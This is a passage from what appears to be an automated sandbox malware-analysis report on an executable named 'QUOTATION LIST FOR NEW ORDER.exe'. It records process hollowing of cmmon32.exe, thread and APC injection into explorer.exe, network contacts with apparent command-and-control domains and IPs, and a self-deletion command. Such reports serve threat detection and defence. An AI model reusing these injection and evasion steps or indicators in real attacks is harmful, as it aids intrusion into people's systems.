          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 12_2_04857794 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 12_2_04802397 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 12_2_047DDB60 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 12_2_047EFF60 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 12_2_047DF358 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 12_2_04804BAD mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 12_2_04804BAD mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 12_2_04804BAD mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 12_2_048A5BA5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 12_2_047DDB40 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 12_2_047EEF40 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 12_2_048553CA mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 12_2_048553CA mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 12_2_047D4F2E mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 12_2_047D4F2E mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 12_2_048003E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 12_2_048003E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 12_2_048003E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 12_2_048003E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 12_2_048003E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 12_2_048003E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 12_2_047FF716 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 12_2_048137F5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 12_2_048A070D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 12_2_048A070D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 12_2_0480A70E mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 12_2_0480A70E mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 12_2_0489131B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 12_2_0486FF10 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 12_2_0486FF10 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 12_2_047FDBE9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 12_2_0480E730 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 12_2_048A8B58 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 12_2_048A8F6A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 12_2_047E8794 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 12_2_047E1B8F mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 12_2_047E1B8F mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 12_2_04803B7A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 12_2_04803B7A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\QUOTATION LIST FOR NEW ORDER.exeProcess token adjusted: Debug
          Source: C:\Users\user\Desktop\QUOTATION LIST FOR NEW ORDER.exeProcess token adjusted: Debug
          Source: C:\Windows\SysWOW64\cmmon32.exeProcess token adjusted: Debug
          Source: C:\Users\user\Desktop\QUOTATION LIST FOR NEW ORDER.exeMemory allocated: page read and write | page guard

          HIPS / PFW / Operating System Protection Evasion:

          barindex
          System process connects to network (likely due to code injection or exploit)Show sources
          Source: C:\Windows\explorer.exeDomain query: www.quotovate.com
          Source: C:\Windows\explorer.exeNetwork Connect: 204.11.58.233 80
          Source: C:\Windows\explorer.exeDomain query: www.tomio.tech
          Source: C:\Windows\explorer.exeDomain query: www.everesttechsolutions.com
          Source: C:\Windows\explorer.exeNetwork Connect: 47.222.2.124 80
          Maps a DLL or memory area into another processShow sources
          Source: C:\Users\user\Desktop\QUOTATION LIST FOR NEW ORDER.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
          Source: C:\Users\user\Desktop\QUOTATION LIST FOR NEW ORDER.exeSection loaded: unknown target: C:\Windows\SysWOW64\cmmon32.exe protection: execute and read and write
          Source: C:\Users\user\Desktop\QUOTATION LIST FOR NEW ORDER.exeSection loaded: unknown target: C:\Windows\SysWOW64\cmmon32.exe protection: execute and read and write
          Source: C:\Windows\SysWOW64\cmmon32.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: read write
          Source: C:\Windows\SysWOW64\cmmon32.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
          Modifies the context of a thread in another process (thread injection)Show sources
          Source: C:\Users\user\Desktop\QUOTATION LIST FOR NEW ORDER.exeThread register set: target process: 3292
          Source: C:\Windows\SysWOW64\cmmon32.exeThread register set: target process: 3292
          Queues an APC in another process (thread injection)Show sources
          Source: C:\Users\user\Desktop\QUOTATION LIST FOR NEW ORDER.exeThread APC queued: target process: C:\Windows\explorer.exe
          Sample uses process hollowing techniqueShow sources
          Source: C:\Users\user\Desktop\QUOTATION LIST FOR NEW ORDER.exeSection unmapped: C:\Windows\SysWOW64\cmmon32.exe base address: 3D0000
          Source: C:\Users\user\Desktop\QUOTATION LIST FOR NEW ORDER.exeProcess created: C:\Users\user\Desktop\QUOTATION LIST FOR NEW ORDER.exe C:\Users\user\Desktop\QUOTATION LIST FOR NEW ORDER.exe
          Source: C:\Users\user\Desktop\QUOTATION LIST FOR NEW ORDER.exeProcess created: C:\Users\user\Desktop\QUOTATION LIST FOR NEW ORDER.exe C:\Users\user\Desktop\QUOTATION LIST FOR NEW ORDER.exe
          Source: C:\Windows\SysWOW64\cmmon32.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\QUOTATION LIST FOR NEW ORDER.exe'
          Source: explorer.exe, 0000000B.00000000.350335948.0000000001400000.00000002.00000001.sdmpBinary or memory string: uProgram Manager
          Source: explorer.exe, 0000000B.00000000.334676030.0000000005F40000.00000004.00000001.sdmpBinary or memory string: Shell_TrayWnd
          Source: explorer.exe, 0000000B.00000000.350335948.0000000001400000.00000002.00000001.sdmpBinary or memory string: Progman
          Source: explorer.exe, 0000000B.00000000.349692580.0000000000EB8000.00000004.00000020.sdmpBinary or memory string: ProgmanX
          Source: explorer.exe, 0000000B.00000000.350335948.0000000001400000.00000002.00000001.sdmpBinary or memory string: Progmanlock
          Source: explorer.exe, 0000000B.00000000.338696952.0000000008ACF000.00000004.00000001.sdmpBinary or memory string: Shell_TrayWndAj
          Source: C:\Users\user\Desktop\QUOTATION LIST FOR NEW ORDER.exeQueries volume information: C:\Users\user\Desktop\QUOTATION LIST FOR NEW ORDER.exe VolumeInformation
          Source: C:\Users\user\Desktop\QUOTATION LIST FOR NEW ORDER.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
          Source: C:\Users\user\Desktop\QUOTATION LIST FOR NEW ORDER.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
          Source: C:\Users\user\Desktop\QUOTATION LIST FOR NEW ORDER.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
          Source: C:\Users\user\Desktop\QUOTATION LIST FOR NEW ORDER.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
          Source: C:\Users\user\Desktop\QUOTATION LIST FOR NEW ORDER.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Runtime.Remoting\v4.0_4.0.0.0__b77a5c561934e089\System.Runtime.Remoting.dll VolumeInformation
          Source: C:\Users\user\Desktop\QUOTATION LIST FOR NEW ORDER.exeQueries volume information: C:\Windows\Fonts\arial.ttf VolumeInformation
          Source: C:\Users\user\Desktop\QUOTATION LIST FOR NEW ORDER.exeQueries volume information: C:\Windows\Fonts\ariali.ttf VolumeInformation
          Source: C:\Users\user\Desktop\QUOTATION LIST FOR NEW ORDER.exeQueries volume information: C:\Windows\Fonts\arialbd.ttf VolumeInformation
          Source: C:\Users\user\Desktop\QUOTATION LIST FOR NEW ORDER.exeQueries volume information: C:\Windows\Fonts\arialbi.ttf VolumeInformation
          Source: C:\Users\user\Desktop\QUOTATION LIST FOR NEW ORDER.exeQueries volume information: C:\Windows\Fonts\ARIALN.TTF VolumeInformation
          Source: C:\Users\user\Desktop\QUOTATION LIST FOR NEW ORDER.exeQueries volume information: C:\Windows\Fonts\ariblk.ttf VolumeInformation
          Source: C:\Users\user\Desktop\QUOTATION LIST FOR NEW ORDER.exeQueries volume information: C:\Windows\Fonts\ARIALNI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\QUOTATION LIST FOR NEW ORDER.exeQueries volume information: C:\Windows\Fonts\ARIALNB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\QUOTATION LIST FOR NEW ORDER.exeQueries volume information: C:\Windows\Fonts\ARIALNBI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\QUOTATION LIST FOR NEW ORDER.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation
          Source: C:\Users\user\Desktop\QUOTATION LIST FOR NEW ORDER.exeQueries volume information: C:\Windows\Fonts\calibri.ttf VolumeInformation
          Source: C:\Users\user\Desktop\QUOTATION LIST FOR NEW ORDER.exeQueries volume information: C:\Windows\Fonts\calibril.ttf VolumeInformation
          Source: C:\Users\user\Desktop\QUOTATION LIST FOR NEW ORDER.exeQueries volume information: C:\Windows\Fonts\calibrii.ttf VolumeInformation
          Source: C:\Users\user\Desktop\QUOTATION LIST FOR NEW ORDER.exeQueries volume information: C:\Windows\Fonts\calibrili.ttf VolumeInformation
          Source: C:\Users\user\Desktop\QUOTATION LIST FOR NEW ORDER.exeQueries volume information: C:\Windows\Fonts\calibrib.ttf VolumeInformation
          Source: C:\Users\user\Desktop\QUOTATION LIST FOR NEW ORDER.exeQueries volume information: C:\Windows\Fonts\calibriz.ttf VolumeInformation
          Source: C:\Users\user\Desktop\QUOTATION LIST FOR NEW ORDER.exeQueries volume information: C:\Windows\Fonts\cambria.ttc VolumeInformation
          Source: C:\Users\user\Desktop\QUOTATION LIST FOR NEW ORDER.exeQueries volume information: C:\Windows\Fonts\cambriai.ttf VolumeInformation
          Source: C:\Users\user\Desktop\QUOTATION LIST FOR NEW ORDER.exeQueries volume information: C:\Windows\Fonts\cambriab.ttf VolumeInformation
          Source: C:\Users\user\Desktop\QUOTATION LIST FOR NEW ORDER.exeQueries volume information: C:\Windows\Fonts\cambriaz.ttf VolumeInformation
          Source: C:\Users\user\Desktop\QUOTATION LIST FOR NEW ORDER.exeQueries volume information: C:\Windows\Fonts\Candara.ttf VolumeInformation
          Source: C:\Users\user\Desktop\QUOTATION LIST FOR NEW ORDER.exeQueries volume information: C:\Windows\Fonts\Candarai.ttf VolumeInformation
          Source: C:\Users\user\Desktop\QUOTATION LIST FOR NEW ORDER.exeQueries volume information: C:\Windows\Fonts\Candarab.ttf VolumeInformation
          Source: C:\Users\user\Desktop\QUOTATION LIST FOR NEW ORDER.exeQueries volume information: C:\Windows\Fonts\Candaraz.ttf VolumeInformation
          Source: C:\Users\user\Desktop\QUOTATION LIST FOR NEW ORDER.exeQueries volume information: C:\Windows\Fonts\comic.ttf VolumeInformation
          Source: C:\Users\user\Desktop\QUOTATION LIST FOR NEW ORDER.exeQueries volume information: C:\Windows\Fonts\comici.ttf VolumeInformation
          Source: C:\Users\user\Desktop\QUOTATION LIST FOR NEW ORDER.exeQueries volume information: C:\Windows\Fonts\comicbd.ttf VolumeInformation
          Source: C:\Users\user\Desktop\QUOTATION LIST FOR NEW ORDER.exeQueries volume information: C:\Windows\Fonts\comicz.ttf VolumeInformation
          Source: C:\Users\user\Desktop\QUOTATION LIST FOR NEW ORDER.exeQueries volume information: C:\Windows\Fonts\consola.ttf VolumeInformation
          Source: C:\Users\user\Desktop\QUOTATION LIST FOR NEW ORDER.exeQueries volume information: C:\Windows\Fonts\consolai.ttf VolumeInformation
          Source: C:\Users\user\Desktop\QUOTATION LIST FOR NEW ORDER.exeQueries volume information: C:\Windows\Fonts\consolab.ttf VolumeInformation
          Source: C:\Users\user\Desktop\QUOTATION LIST FOR NEW ORDER.exeQueries volume information: C:\Windows\Fonts\consolaz.ttf VolumeInformation
          Source: C:\Users\user\Desktop\QUOTATION LIST FOR NEW ORDER.exeQueries volume information: C:\Windows\Fonts\constan.ttf VolumeInformation
          Source: C:\Users\user\Desktop\QUOTATION LIST FOR NEW ORDER.exeQueries volume information: C:\Windows\Fonts\constani.ttf VolumeInformation
          Source: C:\Users\user\Desktop\QUOTATION LIST FOR NEW ORDER.exeQueries volume information: C:\Windows\Fonts\constanb.ttf VolumeInformation
          Source: C:\Users\user\Desktop\QUOTATION LIST FOR NEW ORDER.exeQueries volume information: C:\Windows\Fonts\constanz.ttf VolumeInformation
          Source: C:\Users\user\Desktop\QUOTATION LIST FOR NEW ORDER.exeQueries volume information: C:\Windows\Fonts\corbel.ttf VolumeInformation
          Source: C:\Users\user\Desktop\QUOTATION LIST FOR NEW ORDER.exeQueries volume information: C:\Windows\Fonts\corbeli.ttf VolumeInformation
          Source: C:\Users\user\Desktop\QUOTATION LIST FOR NEW ORDER.exeQueries volume information: C:\Windows\Fonts\corbelb.ttf VolumeInformation
          Source: C:\Users\user\Desktop\QUOTATION LIST FOR NEW ORDER.exeQueries volume information: C:\Windows\Fonts\corbelz.ttf VolumeInformation
          Source: C:\Users\user\Desktop\QUOTATION LIST FOR NEW ORDER.exeQueries volume information: C:\Windows\Fonts\cour.ttf VolumeInformation
          Source: C:\Users\user\Desktop\QUOTATION LIST FOR NEW ORDER.exeQueries volume information: C:\Windows\Fonts\couri.ttf VolumeInformation
          Source: C:\Users\user\Desktop\QUOTATION LIST FOR NEW ORDER.exeQueries volume information: C:\Windows\Fonts\courbd.ttf VolumeInformation
          Source: C:\Users\user\Desktop\QUOTATION LIST FOR NEW ORDER.exeQueries volume information: C:\Windows\Fonts\courbi.ttf VolumeInformation
          Source: C:\Users\user\Desktop\QUOTATION LIST FOR NEW ORDER.exeQueries volume information: C:\Windows\Fonts\ebrima.ttf VolumeInformation
          Source: C:\Users\user\Desktop\QUOTATION LIST FOR NEW ORDER.exeQueries volume information: C:\Windows\Fonts\ebrimabd.ttf VolumeInformation
          Source: C:\Users\user\Desktop\QUOTATION LIST FOR NEW ORDER.exeQueries volume information: C:\Windows\Fonts\framd.ttf VolumeInformation
          Source: C:\Users\user\Desktop\QUOTATION LIST FOR NEW ORDER.exeQueries volume information: C:\Windows\Fonts\FRADM.TTF VolumeInformation
          Source: C:\Users\user\Desktop\QUOTATION LIST FOR NEW ORDER.exeQueries volume information: C:\Windows\Fonts\framdit.ttf VolumeInformation
          Source: C:\Users\user\Desktop\QUOTATION LIST FOR NEW ORDER.exeQueries volume information: C:\Windows\Fonts\FRADMIT.TTF VolumeInformation
          Source: C:\Users\user\Desktop\QUOTATION LIST FOR NEW ORDER.exeQueries volume information: C:\Windows\Fonts\FRAMDCN.TTF VolumeInformation
          Source: C:\Users\user\Desktop\QUOTATION LIST FOR NEW ORDER.exeQueries volume information: C:\Windows\Fonts\FRADMCN.TTF VolumeInformation
          Source: C:\Users\user\Desktop\QUOTATION LIST FOR NEW ORDER.exeQueries volume information: C:\Windows\Fonts\FRAHV.TTF VolumeInformation
          Source: C:\Users\user\Desktop\QUOTATION LIST FOR NEW ORDER.exeQueries volume information: C:\Windows\Fonts\FRAHVIT.TTF VolumeInformation
          Source: C:\Users\user\Desktop\QUOTATION LIST FOR NEW ORDER.exeQueries volume information: C:\Windows\Fonts\Gabriola.ttf VolumeInformation
          Source: C:\Users\user\Desktop\QUOTATION LIST FOR NEW ORDER.exeQueries volume information: C:\Windows\Fonts\gadugi.ttf VolumeInformation
          Source: C:\Users\user\Desktop\QUOTATION LIST FOR NEW ORDER.exeQueries volume information: C:\Windows\Fonts\gadugib.ttf VolumeInformation
          Source: C:\Users\user\Desktop\QUOTATION LIST FOR NEW ORDER.exeQueries volume information: C:\Windows\Fonts\georgia.ttf VolumeInformation
          Source: C:\Users\user\Desktop\QUOTATION LIST FOR NEW ORDER.exeQueries volume information: C:\Windows\Fonts\georgiai.ttf VolumeInformation
          Source: C:\Users\user\Desktop\QUOTATION LIST FOR NEW ORDER.exeQueries volume information: C:\Windows\Fonts\georgiab.ttf VolumeInformation
          Source: C:\Users\user\Desktop\QUOTATION LIST FOR NEW ORDER.exeQueries volume information: C:\Windows\Fonts\georgiaz.ttf VolumeInformation
          Source: C:\Users\user\Desktop\QUOTATION LIST FOR NEW ORDER.exeQueries volume information: C:\Windows\Fonts\impact.ttf VolumeInformation
          Source: C:\Users\user\Desktop\QUOTATION LIST FOR NEW ORDER.exeQueries volume information: C:\Windows\Fonts\Inkfree.ttf VolumeInformation
          Source: C:\Users\user\Desktop\QUOTATION LIST FOR NEW ORDER.exeQueries volume information: C:\Windows\Fonts\javatext.ttf VolumeInformation
          Source: C:\Users\user\Desktop\QUOTATION LIST FOR NEW ORDER.exeQueries volume information: C:\Windows\Fonts\LeelawUI.ttf VolumeInformation
          Source: C:\Users\user\Desktop\QUOTATION LIST FOR NEW ORDER.exeQueries volume information: C:\Windows\Fonts\LeelUIsl.ttf VolumeInformation
          Source: C:\Users\user\Desktop\QUOTATION LIST FOR NEW ORDER.exeQueries volume information: C:\Windows\Fonts\LeelaUIb.ttf VolumeInformation
          Source: C:\Users\user\Desktop\QUOTATION LIST FOR NEW ORDER.exeQueries volume information: C:\Windows\Fonts\lucon.ttf VolumeInformation
          Source: C:\Users\user\Desktop\QUOTATION LIST FOR NEW ORDER.exeQueries volume information: C:\Windows\Fonts\l_10646.ttf VolumeInformation
          Source: C:\Users\user\Desktop\QUOTATION LIST FOR NEW ORDER.exeQueries volume information: C:\Windows\Fonts\malgun.ttf VolumeInformation
          Source: C:\Users\user\Desktop\QUOTATION LIST FOR NEW ORDER.exeQueries volume information: C:\Windows\Fonts\malgunsl.ttf VolumeInformation
          Source: C:\Users\user\Desktop\QUOTATION LIST FOR NEW ORDER.exeQueries volume information: C:\Windows\Fonts\malgunbd.ttf VolumeInformation
          Source: C:\Users\user\Desktop\QUOTATION LIST FOR NEW ORDER.exeQueries volume information: C:\Windows\Fonts\himalaya.ttf VolumeInformation
          Source: C:\Users\user\Desktop\QUOTATION LIST FOR NEW ORDER.exeQueries volume information: C:\Windows\Fonts\msjh.ttc VolumeInformation
          Source: C:\Users\user\Desktop\QUOTATION LIST FOR NEW ORDER.exeQueries volume information: C:\Windows\Fonts\msjhl.ttc VolumeInformation
          Source: C:\Users\user\Desktop\QUOTATION LIST FOR NEW ORDER.exeQueries volume information: C:\Windows\Fonts\msjhbd.ttc VolumeInformation
          Source: C:\Users\user\Desktop\QUOTATION LIST FOR NEW ORDER.exeQueries volume information: C:\Windows\Fonts\ntailu.ttf VolumeInformation
          Source: C:\Users\user\Desktop\QUOTATION LIST FOR NEW ORDER.exeQueries volume information: C:\Windows\Fonts\ntailub.ttf VolumeInformation
          Source: C:\Users\user\Desktop\QUOTATION LIST FOR NEW ORDER.exeQueries volume information: C:\Windows\Fonts\phagspa.ttf VolumeInformation
          Source: C:\Users\user\Desktop\QUOTATION LIST FOR NEW ORDER.exeQueries volume information: C:\Windows\Fonts\phagspab.ttf VolumeInformation
          Source: C:\Users\user\Desktop\QUOTATION LIST FOR NEW ORDER.exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformation
          Source: C:\Users\user\Desktop\QUOTATION LIST FOR NEW ORDER.exeQueries volume information: C:\Windows\Fonts\taile.ttf VolumeInformation
          Source: C:\Users\user\Desktop\QUOTATION LIST FOR NEW ORDER.exeQueries volume information: C:\Windows\Fonts\taileb.ttf VolumeInformation
          Source: C:\Users\user\Desktop\QUOTATION LIST FOR NEW ORDER.exeQueries volume information: C:\Windows\Fonts\msyh.ttc VolumeInformation
          Source: C:\Users\user\Desktop\QUOTATION LIST FOR NEW ORDER.exeQueries volume information: C:\Windows\Fonts\msyhl.ttc VolumeInformation
          Source: C:\Users\user\Desktop\QUOTATION LIST FOR NEW ORDER.exeQueries volume information: C:\Windows\Fonts\msyhbd.ttc VolumeInformation
          Source: C:\Users\user\Desktop\QUOTATION LIST FOR NEW ORDER.exeQueries volume information: C:\Windows\Fonts\msyi.ttf VolumeInformation
          Source: C:\Users\user\Desktop\QUOTATION LIST FOR NEW ORDER.exeQueries volume information: C:\Windows\Fonts\mingliub.ttc VolumeInformation
          Source: C:\Users\user\Desktop\QUOTATION LIST FOR NEW ORDER.exeQueries volume information: C:\Windows\Fonts\monbaiti.ttf VolumeInformation
          Source: C:\Users\user\Desktop\QUOTATION LIST FOR NEW ORDER.exeQueries volume information: C:\Windows\Fonts\msgothic.ttc VolumeInformation
          Source: C:\Users\user\Desktop\QUOTATION LIST FOR NEW ORDER.exeQueries volume information: C:\Windows\Fonts\mvboli.ttf VolumeInformation
          Source: C:\Users\user\Desktop\QUOTATION LIST FOR NEW ORDER.exeQueries volume information: C:\Windows\Fonts\mmrtext.ttf VolumeInformation
          Source: C:\Users\user\Desktop\QUOTATION LIST FOR NEW ORDER.exeQueries volume information: C:\Windows\Fonts\mmrtextb.ttf VolumeInformation
          Source: C:\Users\user\Desktop\QUOTATION LIST FOR NEW ORDER.exeQueries volume information: C:\Windows\Fonts\Nirmala.ttf VolumeInformation
          Source: C:\Users\user\Desktop\QUOTATION LIST FOR NEW ORDER.exeQueries volume information: C:\Windows\Fonts\NirmalaS.ttf VolumeInformation
          Source: C:\Users\user\Desktop\QUOTATION LIST FOR NEW ORDER.exeQueries volume information: C:\Windows\Fonts\NirmalaB.ttf VolumeInformation
          Source: C:\Users\user\Desktop\QUOTATION LIST FOR NEW ORDER.exeQueries volume information: C:\Windows\Fonts\pala.ttf VolumeInformation
          Source: C:\Users\user\Desktop\QUOTATION LIST FOR NEW ORDER.exeQueries volume information: C:\Windows\Fonts\palai.ttf VolumeInformation
          Source: C:\Users\user\Desktop\QUOTATION LIST FOR NEW ORDER.exeQueries volume information: C:\Windows\Fonts\palab.ttf VolumeInformation
          Source: C:\Users\user\Desktop\QUOTATION LIST FOR NEW ORDER.exeQueries volume information: C:\Windows\Fonts\palabi.ttf VolumeInformation
          Source: C:\Users\user\Desktop\QUOTATION LIST FOR NEW ORDER.exeQueries volume information: C:\Windows\Fonts\segoepr.ttf VolumeInformation
          Source: C:\Users\user\Desktop\QUOTATION LIST FOR NEW ORDER.exeQueries volume information: C:\Windows\Fonts\segoeprb.ttf VolumeInformation
          Source: C:\Users\user\Desktop\QUOTATION LIST FOR NEW ORDER.exeQueries volume information: C:\Windows\Fonts\segoesc.ttf VolumeInformation
          Source: C:\Users\user\Desktop\QUOTATION LIST FOR NEW ORDER.exeQueries volume information: C:\Windows\Fonts\segoescb.ttf VolumeInformation
          Source: C:\Users\user\Desktop\QUOTATION LIST FOR NEW ORDER.exeQueries volume information: C:\Windows\Fonts\seguiemj.ttf VolumeInformation
          Source: C:\Users\user\Desktop\QUOTATION LIST FOR NEW ORDER.exeQueries volume information: C:\Windows\Fonts\seguihis.ttf VolumeInformation
          Source: C:\Users\user\Desktop\QUOTATION LIST FOR NEW ORDER.exeQueries volume information: C:\Windows\Fonts\seguisym.ttf VolumeInformation
          Source: C:\Users\user\Desktop\QUOTATION LIST FOR NEW ORDER.exeQueries volume information: C:\Windows\Fonts\simsun.ttc VolumeInformation
          Source: C:\Users\user\Desktop\QUOTATION LIST FOR NEW ORDER.exeQueries volume information: C:\Windows\Fonts\simsunb.ttf VolumeInformation
          Source: C:\Users\user\Desktop\QUOTATION LIST FOR NEW ORDER.exeQueries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformation
          Source: C:\Users\user\Desktop\QUOTATION LIST FOR NEW ORDER.exeQueries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformation
          Source: C:\Users\user\Desktop\QUOTATION LIST FOR NEW ORDER.exeQueries volume information: C:\Windows\Fonts\SitkaB.ttc VolumeInformation
          Source: C:\Users\user\Desktop\QUOTATION LIST FOR NEW ORDER.exeQueries volume information: C:\Windows\Fonts\SitkaZ.ttc VolumeInformation
          Source: C:\Users\user\Desktop\QUOTATION LIST FOR NEW ORDER.exeQueries volume information: C:\Windows\Fonts\sylfaen.ttf VolumeInformation
          Source: C:\Users\user\Desktop\QUOTATION LIST FOR NEW ORDER.exeQueries volume information: C:\Windows\Fonts\symbol.ttf VolumeInformation
          Source: C:\Users\user\Desktop\QUOTATION LIST FOR NEW ORDER.exeQueries volume information: C:\Windows\Fonts\tahoma.ttf VolumeInformation
          Source: C:\Users\user\Desktop\QUOTATION LIST FOR NEW ORDER.exeQueries volume information: C:\Windows\Fonts\tahomabd.ttf VolumeInformation
          Source: C:\Users\user\Desktop\QUOTATION LIST FOR NEW ORDER.exeQueries volume information: C:\Windows\Fonts\trebuc.ttf VolumeInformation
          Source: C:\Users\user\Desktop\QUOTATION LIST FOR NEW ORDER.exeQueries volume information: C:\Windows\Fonts\trebucit.ttf VolumeInformation
          Source: C:\Users\user\Desktop\QUOTATION LIST FOR NEW ORDER.exeQueries volume information: C:\Windows\Fonts\trebucbd.ttf VolumeInformation
          Source: C:\Users\user\Desktop\QUOTATION LIST FOR NEW ORDER.exeQueries volume information: C:\Windows\Fonts\trebucbi.ttf VolumeInformation
          Source: C:\Users\user\Desktop\QUOTATION LIST FOR NEW ORDER.exeQueries volume information: C:\Windows\Fonts\verdana.ttf VolumeInformation
          Source: C:\Users\user\Desktop\QUOTATION LIST FOR NEW ORDER.exeQueries volume information: C:\Windows\Fonts\verdanai.ttf VolumeInformation
          Source: C:\Users\user\Desktop\QUOTATION LIST FOR NEW ORDER.exeQueries volume information: C:\Windows\Fonts\verdanab.ttf VolumeInformation
          Source: C:\Users\user\Desktop\QUOTATION LIST FOR NEW ORDER.exeQueries volume information: C:\Windows\Fonts\verdanaz.ttf VolumeInformation
          Source: C:\Users\user\Desktop\QUOTATION LIST FOR NEW ORDER.exeQueries volume information: C:\Windows\Fonts\webdings.ttf VolumeInformation
          Source: C:\Users\user\Desktop\QUOTATION LIST FOR NEW ORDER.exeQueries volume information: C:\Windows\Fonts\wingding.ttf VolumeInformation
          Source: C:\Users\user\Desktop\QUOTATION LIST FOR NEW ORDER.exeQueries volume information: C:\Windows\Fonts\YuGothR.ttc VolumeInformation
          Source: C:\Users\user\Desktop\QUOTATION LIST FOR NEW ORDER.exeQueries volume information: C:\Windows\Fonts\YuGothM.ttc VolumeInformation
          Source: C:\Users\user\Desktop\QUOTATION LIST FOR NEW ORDER.exeQueries volume information: C:\Windows\Fonts\YuGothL.ttc VolumeInformation
          Source: C:\Users\user\Desktop\QUOTATION LIST FOR NEW ORDER.exeQueries volume information: C:\Windows\Fonts\YuGothB.ttc VolumeInformation
          Source: C:\Users\user\Desktop\QUOTATION LIST FOR NEW ORDER.exeQueries volume information: C:\Windows\Fonts\holomdl2.ttf VolumeInformation
          Source: C:\Users\user\Desktop\QUOTATION LIST FOR NEW ORDER.exeQueries volume information: C:\Windows\Fonts\CENTURY.TTF VolumeInformation
          Source: C:\Users\user\Desktop\QUOTATION LIST FOR NEW ORDER.exeQueries volume information: C:\Windows\Fonts\LEELAWAD.TTF VolumeInformation
          Source: C:\Users\user\Desktop\QUOTATION LIST FOR NEW ORDER.exeQueries volume information: C:\Windows\Fonts\LEELAWDB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\QUOTATION LIST FOR NEW ORDER.exeQueries volume information: C:\Windows\Fonts\MSUIGHUR.TTF VolumeInformation
